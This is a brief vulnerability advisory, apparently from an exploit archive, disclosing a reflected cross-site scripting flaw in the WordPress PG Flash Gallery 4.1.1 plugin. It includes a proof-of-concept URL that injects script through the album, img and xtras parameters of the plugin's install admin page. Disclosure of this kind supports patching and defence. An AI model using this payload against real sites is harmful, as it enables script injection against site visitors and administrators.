------------------------------------------------------------------------ Software................WordPress PG Flash Gallery 4.1.1 Vulnerability...........Reflected Cross-site Scripting Download................http://www.photo-graffix.com/wordpress_plugin.php Release Date............2/23/2011 Tested On...............Windows 7 + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in WordPress PG Flash Gallery 4.1.1 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/wordpress/wp-content/plugins/pg-flash-gallery/gallery/install/admin.php?album=%22;alert(0);//&img=%22;alert(0);//&xtras=%22;alert(0);//